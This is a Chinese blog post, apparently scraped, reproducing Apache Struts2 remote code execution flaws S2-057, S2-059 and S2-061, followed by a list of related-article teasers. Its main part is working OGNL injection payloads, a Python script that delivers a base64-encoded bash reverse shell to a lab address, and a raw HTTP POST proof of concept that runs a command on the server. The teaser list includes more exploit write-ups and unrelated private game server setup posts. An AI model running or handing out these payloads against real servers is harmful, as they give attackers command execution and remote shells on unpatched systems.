Struts2 远程代码执行漏洞复现(附Struts2漏洞检测工具)

article/2025/9/23 7:46:00

0x00 Struts2 简介

Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序。该框架多版本存在远程代码执行,

0x01 Struts2 (CVE-2018-11776)

Struts2 S2-057

payload:/struts2-showcase/$%7B233*233%7D/actionChain1.action

验证漏洞存在:

paylaod:ls:查看目录下文件,paylaod需要进行url编码
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

0x02 Struts2 (CVE-2019-0230)

Struts2 S2-059

漏洞验证paylaod:/?id=%25{2*5}


反弹shell:paylaod:使用python3环境,运行前查看环境执行是否正常

反弹paylaod:bash -i >& /dev/tcp/192.168.222.134/6666 0>&1
需要base64加密放入下paylaod
import requests
url = "http://192.168.222.134:8080"
data1 = {"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMi4xMzQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'))}"
}
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
print(123)

执行脚本

shell接收成功:

0x03 Struts2 (CVE-2020-17530)

Struts2 S2-061

POC:post请求:
POST / HTTP/1.1
Host: 192.168.222.134:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node016yd6hhrzkka19x0sws5e7i9g1.node0
If-None-Match: W/"187-1504645830000"
If-Modified-Since: Tue, 05 Sep 2017 21:10:30 GMT
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Connection: close
Content-Length: 829------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

0x04 strust2 命令执行检测工具

github:https://github.com/HatBoy/Struts2-Scan
现支持部分序号的st2检测:s2-053之前,测试过程还是出现了很多问题,实战中建议使用单独的对应exp检测


http://chatgpt.dhexx.cn/article/IPxeMAdQ.shtml

相关文章

Struts2漏洞利用原理

Struts2漏洞利用原理

概述: Struts2是apache项目下的一个web 框架,目前web框架中非常流行的都是mvc设计模式、经典例子例如:python的Django、Flask;java的ssm等。因为使用MVC设计模式,所以在框架内部处理用户数据流参数的事后就不可避免的存在数据在不同层次流转的问题。struts2作为java的一款成…
阅读更多...
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045

Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045

文章目录 Struts2简介Struts2历史漏洞Struts2历史漏洞发现Struts2框架识别 Struts2历史漏洞利用Struts2-015漏洞简介影响范围环境搭建漏洞复现 Struts2-016漏洞简介影响范围环境搭建漏洞复现 Struts2-045漏洞简介影响范围环境搭建漏洞复现 Struts2简介 Apache Struts是美国阿帕…
阅读更多...
Struts2漏洞S2-005复现

Struts2漏洞S2-005复现

1.漏洞描述 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码…
阅读更多...
Struts2 漏洞集合

Struts2 漏洞集合

Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署 S2-001 (CVE-…
阅读更多...
Vulhub靶场之struts2漏洞复现

Vulhub靶场之struts2漏洞复现

简介 struts2漏洞中属s2系列杀伤力最大,可以造成远程命令执行漏洞。 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能…
阅读更多...
java struts2 漏洞_Struts2漏洞利用

java struts2 漏洞_Struts2漏洞利用

Struts漏洞合集 Struts-S2-013漏洞利用 受影响版本 Struts 2.0.0 - Struts 2.3.14.1 漏洞利用 任意命令执行POC: ${(#_memberAccess["allowStaticMethodAccess"]true,#ajava.lang.RuntimegetRuntime().exec(id).getInputStream(),#bnew java.io.InputStre…
阅读更多...
struts2漏洞监测_全版本struts2漏洞练习

struts2漏洞监测_全版本struts2漏洞练习

docker中有struts2全版本的漏洞平台 1、首先在docker中进行下载: # docker pull 2d8ru/struts2 2、其次运行:(48729为物理机的端口,可随意指定) # docker run --name struts2 -p48729:8080 -d 2d8ru/struts2 3、下载struts2漏洞扫描工具&…
阅读更多...
Struts2漏洞复现

Struts2漏洞复现

一. S2-016复现 打开测试靶场,测试该网站存在index.action路径 漏洞原理: 参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行 测试POC: 2.1 /index.action?redirect:%25{3*4}2.2 /index.action?redirect:%…
阅读更多...
java struts2 漏洞_Struts2漏洞简述

java struts2 漏洞_Struts2漏洞简述

S2-005漏洞 S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对象必须要使用#符号,S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过。 S2-005则是绕过官方的安全配置(禁止…
阅读更多...
【渗透测试】Struts2系列漏洞

【渗透测试】Struts2系列漏洞

目录 🌷S2-001 🌼1、漏洞原理 🌼2、影响版本 🌼3、验证方法 🌷S2-005 🌼1、漏洞原理 🌼2、影响版本 🌼3、验证方法(无回显) 🌼4、验证方法&#x…
阅读更多...
Struts2漏洞分析与复现合集

Struts2漏洞分析与复现合集

文章目录 一、基础知识Struts2简介: 二、漏洞复现1、S2-001(OGNL 循环解析导致的 RCE 漏洞)漏洞原理:影响版本:环境搭建:poc:漏洞利用: 2、S2-005(S2-003 的绕过&#xf…
阅读更多...
框架/组件漏洞系列1:struts2漏洞汇总

框架/组件漏洞系列1:struts2漏洞汇总

前言: 本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会&#xff08…
阅读更多...
struts2漏洞

struts2漏洞

文章目录 漏洞一、struts2漏洞 S2-001漏洞原理复现 二、struts2漏洞 S2-005原理 分析一下003复现 三、struts2漏洞s2-007四、struts2漏洞 S2-008原理复现 五、struts2漏洞 S2-009原理复现 六、struts2漏洞 S2-012原理复现 七、struts2漏洞 S2-013原理复现 八、struts2漏洞 S2-0…
阅读更多...
传奇私服搭建+微端

传奇私服搭建+微端

微端服务器引擎 数据库 客户端 版本 本来想发网盘链接,文件涉及敏感无法分享,需要的可以私下给你发。 企鹅号:1404765471 首先准备 1.三台服务器(服务端服务器 微端服务器 列表服务器)推荐Windows2008系统 2.私服…
阅读更多...
传奇开服怎么开服?不会技术自己能开服吗?传奇开服需要准备什么?前期需要投入多少?

传奇开服怎么开服?不会技术自己能开服吗?传奇开服需要准备什么?前期需要投入多少?

传奇开服怎么开服?不会技术自己能开服吗?传奇开服需要准备什么?前期需要投入多少? 作为经典怀旧游戏,传奇赢得了许多人的青睐,在这个科技的时代,玩服已经满足不了了,多数人会选择自己…
阅读更多...
gm修改爆率需要重启服务器吗,传奇SF服务端上修改怪物爆率图文教程

gm修改爆率需要重启服务器吗,传奇SF服务端上修改怪物爆率图文教程

修改怪物爆率基本上是每个版本在改的时候要走的一步,因为每个GM思路不同,想法不同,他给玩家展现出来的版本也不同,就是自己玩单机也要去改,谁不想爆率高点对吧,今天给大家讲解一下通过修改服务端的怪物爆率…
阅读更多...
传奇私服游戏支付接口申请(已解决)

传奇私服游戏支付接口申请(已解决)

传奇游戏是一款经典打怪升级-PK游戏,盛大游戏公司于2001年9月发布,随后出现了众多传奇私服游戏版本。到现在依然受很多人喜爱,经历了多次升级换代,现已转变为游戏体验更加细腻的页游和手游,成为了小成本高收益的热门游…
阅读更多...
传奇开服架设教程

传奇开服架设教程

传奇架设其实很简单 很多网友非常爱玩这款游戏,可能还有朋友不知道怎么架设这款游戏 今天特意写篇传奇架设教程,希望大家都能打造出真正属于自己的传奇 首先传奇架设需要准备以下几个软件 准备工具: 1、传奇服务端(版本&#…
阅读更多...
传奇私服搭建网站的几种方法

传奇私服搭建网站的几种方法

搭建网站的几种方法: 一些人,连简单的搭建网站都不会,还要请技术帮忙,真是牛B,这里简单介绍下几种办法 一:2003系统下,直接使用IIS,这个太简单了,桌面上就有IIS&#xff…
阅读更多...
传奇h5私服源码+教程

传奇h5私服源码+教程

传奇h5私服源码教程 这几天突然想拿服务器做些什么,就想到搭一个私服游戏,学习娱乐一下。废话不多说下面给教程和源码。 传奇h5源码:https://download.csdn.net/download/qq_37258192/11997500 (重新上传了1次,积分变…
阅读更多...
推荐文章

Copyright @ 2022~2023